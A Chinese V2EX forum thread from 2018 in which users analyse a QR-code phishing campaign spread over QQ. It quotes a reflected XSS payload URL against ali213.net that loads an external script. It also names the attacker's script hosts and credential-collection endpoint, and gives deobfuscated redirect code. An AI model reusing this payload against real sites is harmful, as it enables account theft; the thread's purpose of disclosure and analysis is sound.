有没有腾讯的人啊。。好像出了个新漏洞？？？

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

工单节点使用指南

• 请用平和的语言准确描述你所遇到的问题

• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类，尊重是相互的

• 如果是关于 V2EX 本身的问题反馈，请使用反馈节点

这是一个创建于 2080 天前的主题，其中的信息可能已经有所发展或是发生改变。

朋友自动发给我的，说是前不久他朋友发给他的，通过 QQ 传播的，需要在手机 QQ 上扫码

二维码解析后的恶意链接

http://comment.ali213.net/ali-comment-renotice.php?callback=%00%00%00%00%00%00%00%3CscripT/src=//633832.pywbm.cn/template/app.js%3E%3C/scripT%3E%3C!--

其中指向的恶意代码

http://633832.pywbm.cn/template/app.js

鹅厂员工调查下为啥会自动发给好友？

有没有搞安全的大佬研究下？

第 1 条附言 · 2018-08-09 09:55:43 +08:00

游侠网没做防 XSS 注入

手机 QQ 内置浏览器没做 XSS 注入检测

发给

恶意

扫码

41 条回复 • 2018-08-10 10:20:15 +08:00

yejinmo

2018-08-08 21:47:31 +08:00

恶意图片：

tangweihua163

2018-08-08 22:39:18 +08:00

屁大点事儿，又不是山（ shan ）洞（ dong ）佃（ dian ）妇（ fu ）

xmdhs

2018-08-08 22:48:37 +08:00 via iPad

大概是他没看域名就输了密码吧

1024MB

2018-08-08 22:56:01 +08:00 via Android

这是人的漏洞，安全领域叫社会工程学，凯文叫它欺骗的艺术。so,你被骗了，叫警察的漏洞

e1el

2018-08-08 22:59:33 +08:00

这不叫漏洞，这叫
![](

)

lzxgh621

2018-08-08 23:04:51 +08:00

@e1el 不要在论坛发漩涡好吗。。。吓死了

yiqiao

2018-08-08 23:07:36 +08:00

@e1el 心理阴影

Lentin

2018-08-08 23:22:25 +08:00

这个应该是属于 @游侠网 ali213.net 的一个 XSS 漏洞，跟腾讯关系不大

Lentin

2018-08-08 23:25:24 +08:00

https://bbs.ichunqiu.com/thread-43894-1-1.html
其实腾讯也有锅，没有主动 XSS 探测，Chrome 很机智的检测出来了

34C

2018-08-09 02:44:07 +08:00

我想说那个二维码做得蛮好看的…… 有谁知道在哪生成的吗……

sdshdv

2018-08-09 03:22:25 +08:00 via Android

这种老骗术也就刚刚用 QQ 的小学生会上当

qiayue

2018-08-09 07:01:29 +08:00

最后网页会把假的登录框得到的账号和密码传输到 http://qzone.duboy.com.cn/user.php
之后跳转到 http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590，给你看狗

AlisaDestiny

2018-08-09 07:46:06 +08:00

被插入的 js 地址：
```
http://qqq.brhrc.cn/template/login.js
```
![]( https://i.loli.net/2018/08/09/5b6b7ffdeb69b.png)
由于页面代码使用的 base64 编码和 arc4 加密，这是最终解码出来的页面代码：
```
https://paste.ubuntu.com/p/y98DWVZYMg/
```
这是账号提交的地址：
![]( https://i.loli.net/2018/08/09/5b6b80708e653.png)

我能做的就是这么多了。各位如何对待这个服务器请随意。

yamedie

2018-08-09 07:49:34 +08:00 via Android

@34C 联图 liantu.com

jiqing

2018-08-09 08:05:41 +08:00

@AlisaDestiny #12 兄弟你这怎么解码出来的

opengps

2018-08-09 08:07:17 +08:00

这是个老骗术，就是仿站，钓鱼拿到账号密码，你随便输入点他都会记录

yejinmo

2018-08-09 09:21:06 +08:00

@xmdhs #3
@Lentin #8
@Lentin #9
@sdshdv #11

腾讯的确是有很多服务要求你用手机 QQ 扫码登录之类的，只不过这个扫了码之后要求输入账号密码就很假了

想说手机 QQ 内置浏览器为什么没有 XSS 检测。。

yejinmo

2018-08-09 09:22:57 +08:00

@opengps #16

刚开始以为是以前分享攻击之类的，后来问清朋友是主动输入的账号密码被钓了

yejinmo

2018-08-09 09:28:46 +08:00

@34C #10

好像是作者自己弄的。。谷歌了一遍没找到相似图片

CokeMine

2018-08-09 09:43:12 +08:00 via Android

虚假登录界面

同二维码以前差点中过招，还好最后回过神来了
我的好友好几个都被盗给我发一模一样的 zz 二维码了

crazygod

2018-08-09 09:58:34 +08:00

钓鱼网站，最简单的破解方法就是看网址。。。官方一般不会有杂七杂八的前缀和后缀

faceRollingKB

2018-08-09 10:05:07 +08:00

人可以做得更多，看域名看证书
浏览器也可以做得更多，做一些常见的问题检测

yejinmo

2018-08-09 10:19:47 +08:00

@crazygod #21

手机 QQ 扫了码之后没地方看网址。。只能是解了二维码之后在电脑上看

licoycn

2018-08-09 10:22:30 +08:00

很明显钓鱼网站

kfteast

2018-08-09 11:45:53 +08:00

@34C 貌似有个叫第九工场的网站一部分是免费制作绝大部分是收费的

tutustream

2018-08-09 11:57:39 +08:00

@34C #10
@kfteast #25

联图网-二维码美化-吃豆人主题

其实我想说的是，这些美化过的手机扫可能会失败的。

C860

2018-08-09 14:16:30 +08:00

是游侠网的同学修复了？我现在看到的结果是：

fuck_your_mama({"status":"0","msg":"0"})

yejinmo

2018-08-09 14:19:46 +08:00

@C860 #27

游侠网这么有意思嘛

tetsai

2018-08-09 14:22:14 +08:00

@C860 #27 +1，英文加拼音，讲究

houzhishi

2018-08-09 14:37:03 +08:00

@tetsai 的确挺讲究的。

8qwe24657913

2018-08-09 15:03:21 +08:00

@AlisaDestiny #13 那个 pastebin 上代码第 47 行还是混淆过的，解码出来是
var system={win:false,mac:false,xll:false};var p=navigator.platform;system.win=p.indexOf("Win")==0;system.mac=p.indexOf("Mac")==0;system.x11=(p=="X11")||(p.indexOf("Linux")==0);if(system.win||system.mac||system.xll){window.location.href="http://pvp.qq.com/m/"}
如果系统是 win / mac / linux，跳到王者荣耀官网，摆明了是准备只坑手机……

再就是点击登录后跳转的图片
![]( http://yunzhijia.com/microblog/filesvr/5b365ddd364a0f55c8d16590)
这表情嘲讽意义很浓啊